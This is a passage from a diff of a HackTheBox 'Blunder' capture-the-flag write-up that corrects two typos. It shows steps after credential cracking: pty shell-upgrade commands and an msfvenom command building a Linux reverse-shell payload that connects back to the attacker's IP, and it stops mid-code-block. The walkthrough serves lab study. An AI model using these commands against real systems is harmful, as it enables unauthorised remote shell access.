0xNirvana/Writeups/HackTheBox/Easy/blunder/blunder.md

 We can use this password hash and head over to [CrackStation](https://crackstation.net/) to get the password.

-Even though now that we have the credentials for user 'Hugo', we can switch user because we don't have a stable shell.
+Even though now that we have the credentials for user 'Hugo', we can't switch user because we don't have a stable shell.
 To convert this unstable shell to a stable one we can try commands like:

 ```
 1. python -c ‘import pty;pty.spawn(“/bin/bash”)’
 2. echo os.system('/bin/bash')
 ```

-But none of these work.
+But none of these works.
 We can try to create a custom payload using `msfvenom`, send it to the target machine and execute it as:

 ```
 msfvenom -p linux/x64/shell_reverse_tcp RHOST=<your_ip> LPORT=443 -f elf > shell.elf